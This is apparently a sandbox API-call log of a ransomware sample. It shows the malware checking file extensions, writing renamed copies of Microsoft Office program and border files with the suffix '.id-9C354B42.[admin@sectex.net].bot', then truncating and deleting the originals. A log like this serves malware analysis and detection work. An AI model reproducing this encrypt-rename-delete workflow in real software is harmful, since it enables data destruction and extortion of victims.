	[0156.297] lstrlenW (lpString=".xlsx") returned 5
	[0156.297] lstrcmpiW (lpString1=".xlsx", lpString2="2.dll") returned -1
	[0156.297] lstrlenW (lpString=".ppt") returned 4
	[0156.297] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0156.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSStr32.dll") returned 55
	[0156.297] lstrlenW (lpString=".zip") returned 4
	[0156.297] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0156.297] lstrlenW (lpString=".rar") returned 4
	[0156.297] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0156.297] lstrlenW (lpString=".bz2") returned 4
	[0156.297] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0156.297] lstrlenW (lpString=".7z") returned 3
	[0156.297] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0156.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSStr32.dll") returned 55
	[0156.297] lstrlenW (lpString=".dbf") returned 4
	[0156.297] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0156.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSStr32.dll") returned 55
	[0156.297] lstrlenW (lpString=".1cd") returned 4
	[0156.297] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0156.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSStr32.dll") returned 55
	[0156.297] lstrlenW (lpString=".jpg") returned 4
	[0156.297] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0156.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSStr32.dll") returned 55
	[0156.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSStr32.dll") returned 55
	[0156.298] lstrlenW (lpString=".doc") returned 4
	[0156.298] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0156.298] lstrlenW (lpString=".docx") returned 5
	[0156.298] lstrcmpiW (lpString1=".docx", lpString2="2.dll") returned -1
	[0156.298] lstrlenW (lpString=".pdf") returned 4
	[0156.298] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0156.298] lstrlenW (lpString=".xls") returned 4
	[0156.298] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0156.298] lstrlenW (lpString=".xlsx") returned 5
	[0156.298] lstrcmpiW (lpString1=".xlsx", lpString2="2.dll") returned -1
	[0156.298] lstrlenW (lpString=".ppt") returned 4
	[0156.298] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0156.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSStr32.dll") returned 55
	[0156.298] lstrlenW (lpString=".zip") returned 4
	[0156.298] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0156.298] lstrlenW (lpString=".rar") returned 4
	[0156.298] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0156.298] lstrlenW (lpString=".bz2") returned 4
	[0156.298] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0156.298] lstrlenW (lpString=".7z") returned 3
	[0156.298] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0156.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSStr32.dll") returned 55
	[0156.298] lstrlenW (lpString=".dbf") returned 4
	[0156.298] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0156.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSStr32.dll") returned 55
	[0156.298] lstrlenW (lpString=".1cd") returned 4
	[0156.298] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0156.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSStr32.dll") returned 55
	[0156.298] lstrlenW (lpString=".jpg") returned 4
	[0156.298] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0156.299] lstrcmpiW (lpString1=".exe", lpString2=".bot") returned 1
	[0156.299] lstrlenW (lpString="BCSSync.exe") returned 11
	[0156.299] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSSync.exe" (normalized: "c:\\program files\\microsoft office\\office14\\bcssync.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0156.299] GetFileSizeEx (in: hFile=0x3e0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=112512) returned 1
	[0156.299] CloseHandle (hObject=0x3e0) returned 1
	[0156.299] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSSync.exe" (normalized: "c:\\program files\\microsoft office\\office14\\bcssync.exe")) returned 0x20
	[0156.299] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSSync.exe.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\bcssync.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.300] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSSync.exe" (normalized: "c:\\program files\\microsoft office\\office14\\bcssync.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0156.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSSync.exe") returned 54
	[0156.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSSync.exe") returned 54
	[0156.300] lstrlenW (lpString=".doc") returned 4
	[0156.300] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1
	[0156.300] lstrlenW (lpString=".docx") returned 5
	[0156.300] lstrcmpiW (lpString1=".docx", lpString2="c.exe") returned -1
	[0156.300] lstrlenW (lpString=".pdf") returned 4
	[0156.300] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1
	[0156.300] lstrlenW (lpString=".xls") returned 4
	[0156.300] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1
	[0156.300] lstrlenW (lpString=".xlsx") returned 5
	[0156.300] lstrcmpiW (lpString1=".xlsx", lpString2="c.exe") returned -1
	[0156.300] lstrlenW (lpString=".ppt") returned 4
	[0156.300] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1
	[0156.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSSync.exe") returned 54
	[0156.300] lstrlenW (lpString=".zip") returned 4
	[0156.300] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1
	[0156.300] lstrlenW (lpString=".rar") returned 4
	[0156.300] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1
	[0156.300] lstrlenW (lpString=".bz2") returned 4
	[0156.300] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1
	[0156.300] lstrlenW (lpString=".7z") returned 3
	[0156.300] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1
	[0156.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSSync.exe") returned 54
	[0156.300] lstrlenW (lpString=".dbf") returned 4
	[0156.300] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1
	[0156.305] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.305] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.305] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART1.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart1.bdr.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0156.342] GetLastError () returned 0x0
	[0156.342] ReadFile (in: hFile=0x3e0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x7df6, lpOverlapped=0x0) returned 1
	[0156.413] WriteFile (in: hFile=0x3c0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x7e00, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x7e00, lpOverlapped=0x0) returned 1
	[0156.414] ReadFile (in: hFile=0x3e0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.414] WriteFile (in: hFile=0x3c0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0156.415] SetEndOfFile (hFile=0x3c0) returned 1
	[0156.415] CloseHandle (hObject=0x3c0) returned 1
	[0156.415] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.415] SetEndOfFile (hFile=0x3e0) returned 1
	[0156.417] CloseHandle (hObject=0x3e0) returned 1
	[0156.417] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART1.BDR.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.418] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART1.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart1.bdr")) returned 1
	[0156.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART1.BDR") returned 61
	[0156.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART1.BDR") returned 61
	[0156.418] lstrlenW (lpString=".doc") returned 4
	[0156.418] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.418] lstrlenW (lpString=".docx") returned 5
	[0156.418] lstrcmpiW (lpString1=".docx", lpString2="1.BDR") returned -1
	[0156.418] lstrlenW (lpString=".pdf") returned 4
	[0156.418] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.418] lstrlenW (lpString=".xls") returned 4
	[0156.418] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.418] lstrlenW (lpString=".xlsx") returned 5
	[0156.418] lstrcmpiW (lpString1=".xlsx", lpString2="1.BDR") returned -1
	[0156.419] lstrlenW (lpString=".ppt") returned 4
	[0156.419] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART1.BDR") returned 61
	[0156.419] lstrlenW (lpString=".zip") returned 4
	[0156.419] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.419] lstrlenW (lpString=".rar") returned 4
	[0156.419] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.419] lstrlenW (lpString=".bz2") returned 4
	[0156.419] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.419] lstrlenW (lpString=".7z") returned 3
	[0156.419] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART1.BDR") returned 61
	[0156.419] lstrlenW (lpString=".dbf") returned 4
	[0156.419] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART1.BDR") returned 61
	[0156.419] lstrlenW (lpString=".1cd") returned 4
	[0156.419] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART1.BDR") returned 61
	[0156.419] lstrlenW (lpString=".jpg") returned 4
	[0156.419] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART1.BDR") returned 61
	[0156.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART1.BDR") returned 61
	[0156.419] lstrlenW (lpString=".doc") returned 4
	[0156.419] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.419] lstrlenW (lpString=".docx") returned 5
	[0156.419] lstrcmpiW (lpString1=".docx", lpString2="1.BDR") returned -1
	[0156.419] lstrlenW (lpString=".pdf") returned 4
	[0156.419] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.419] lstrlenW (lpString=".xls") returned 4
	[0156.419] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.419] lstrlenW (lpString=".xlsx") returned 5
	[0156.419] lstrcmpiW (lpString1=".xlsx", lpString2="1.BDR") returned -1
	[0156.420] lstrlenW (lpString=".ppt") returned 4
	[0156.420] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART1.BDR") returned 61
	[0156.420] lstrlenW (lpString=".zip") returned 4
	[0156.420] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.420] lstrlenW (lpString=".rar") returned 4
	[0156.420] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.420] lstrlenW (lpString=".bz2") returned 4
	[0156.420] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.420] lstrlenW (lpString=".7z") returned 3
	[0156.420] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART1.BDR") returned 61
	[0156.420] lstrlenW (lpString=".dbf") returned 4
	[0156.420] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART1.BDR") returned 61
	[0156.420] lstrlenW (lpString=".1cd") returned 4
	[0156.420] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART1.BDR") returned 61
	[0156.420] lstrlenW (lpString=".jpg") returned 4
	[0156.420] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.420] lstrcmpiW (lpString1=".BDR", lpString2=".bot") returned -1
	[0156.420] lstrlenW (lpString="MSART14.BDR") returned 11
	[0156.420] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART14.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart14.bdr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0156.421] GetFileSizeEx (in: hFile=0x3e0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=51388) returned 1
	[0156.421] CloseHandle (hObject=0x3e0) returned 1
	[0156.421] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART14.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart14.bdr")) returned 0x20
	[0156.421] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART14.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart14.bdr.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.421] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART14.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart14.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0156.421] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.421] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.421] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART14.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart14.bdr.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0156.422] GetLastError () returned 0x0
	[0156.422] ReadFile (in: hFile=0x3e0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0xc8bc, lpOverlapped=0x0) returned 1
	[0156.452] WriteFile (in: hFile=0x3c0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xc8c0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xc8c0, lpOverlapped=0x0) returned 1
	[0156.453] ReadFile (in: hFile=0x3e0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.453] WriteFile (in: hFile=0x3c0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0156.453] SetEndOfFile (hFile=0x3c0) returned 1
	[0156.454] CloseHandle (hObject=0x3c0) returned 1
	[0156.454] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.454] SetEndOfFile (hFile=0x3e0) returned 1
	[0156.458] CloseHandle (hObject=0x3e0) returned 1
	[0156.458] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART14.BDR.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.499] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART14.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart14.bdr")) returned 1
	[0156.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART14.BDR") returned 62
	[0156.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART14.BDR") returned 62
	[0156.499] lstrlenW (lpString=".doc") returned 4
	[0156.499] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.499] lstrlenW (lpString=".docx") returned 5
	[0156.499] lstrcmpiW (lpString1=".docx", lpString2="4.BDR") returned -1
	[0156.499] lstrlenW (lpString=".pdf") returned 4
	[0156.499] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.499] lstrlenW (lpString=".xls") returned 4
	[0156.500] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.500] lstrlenW (lpString=".xlsx") returned 5
	[0156.500] lstrcmpiW (lpString1=".xlsx", lpString2="4.BDR") returned -1
	[0156.500] lstrlenW (lpString=".ppt") returned 4
	[0156.500] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART14.BDR") returned 62
	[0156.500] lstrlenW (lpString=".zip") returned 4
	[0156.500] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.500] lstrlenW (lpString=".rar") returned 4
	[0156.500] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.500] lstrlenW (lpString=".bz2") returned 4
	[0156.500] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.500] lstrlenW (lpString=".7z") returned 3
	[0156.500] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART14.BDR") returned 62
	[0156.500] lstrlenW (lpString=".dbf") returned 4
	[0156.500] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART14.BDR") returned 62
	[0156.500] lstrlenW (lpString=".1cd") returned 4
	[0156.500] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART14.BDR") returned 62
	[0156.500] lstrlenW (lpString=".jpg") returned 4
	[0156.500] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART14.BDR") returned 62
	[0156.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART14.BDR") returned 62
	[0156.500] lstrlenW (lpString=".doc") returned 4
	[0156.500] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.500] lstrlenW (lpString=".docx") returned 5
	[0156.500] lstrcmpiW (lpString1=".docx", lpString2="4.BDR") returned -1
	[0156.500] lstrlenW (lpString=".pdf") returned 4
	[0156.500] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.500] lstrlenW (lpString=".xls") returned 4
	[0156.501] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.501] lstrlenW (lpString=".xlsx") returned 5
	[0156.501] lstrcmpiW (lpString1=".xlsx", lpString2="4.BDR") returned -1
	[0156.501] lstrlenW (lpString=".ppt") returned 4
	[0156.501] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART14.BDR") returned 62
	[0156.501] lstrlenW (lpString=".zip") returned 4
	[0156.501] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.501] lstrlenW (lpString=".rar") returned 4
	[0156.501] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.501] lstrlenW (lpString=".bz2") returned 4
	[0156.501] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.501] lstrlenW (lpString=".7z") returned 3
	[0156.501] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART14.BDR") returned 62
	[0156.501] lstrlenW (lpString=".dbf") returned 4
	[0156.501] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART14.BDR") returned 62
	[0156.501] lstrlenW (lpString=".1cd") returned 4
	[0156.501] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART14.BDR") returned 62
	[0156.501] lstrlenW (lpString=".jpg") returned 4
	[0156.501] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.501] lstrcmpiW (lpString1=".BDR", lpString2=".bot") returned -1
	[0156.501] lstrlenW (lpString="MSART2.BDR") returned 10
	[0156.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART2.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart2.bdr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0156.502] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=47188) returned 1
	[0156.502] CloseHandle (hObject=0x3dc) returned 1
	[0156.502] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART2.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart2.bdr")) returned 0x20
	[0156.502] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART2.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart2.bdr.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.502] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART2.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart2.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0156.502] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.503] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART2.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart2.bdr.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0156.503] GetLastError () returned 0x0
	[0156.503] ReadFile (in: hFile=0x3dc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0xb854, lpOverlapped=0x0) returned 1
	[0156.510] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xb860, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xb860, lpOverlapped=0x0) returned 1
	[0156.512] ReadFile (in: hFile=0x3dc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.512] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0156.512] SetEndOfFile (hFile=0x3d0) returned 1
	[0156.512] CloseHandle (hObject=0x3d0) returned 1
	[0156.512] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.512] SetEndOfFile (hFile=0x3dc) returned 1
	[0156.515] CloseHandle (hObject=0x3dc) returned 1
	[0156.515] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART2.BDR.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.571] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART2.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart2.bdr")) returned 1
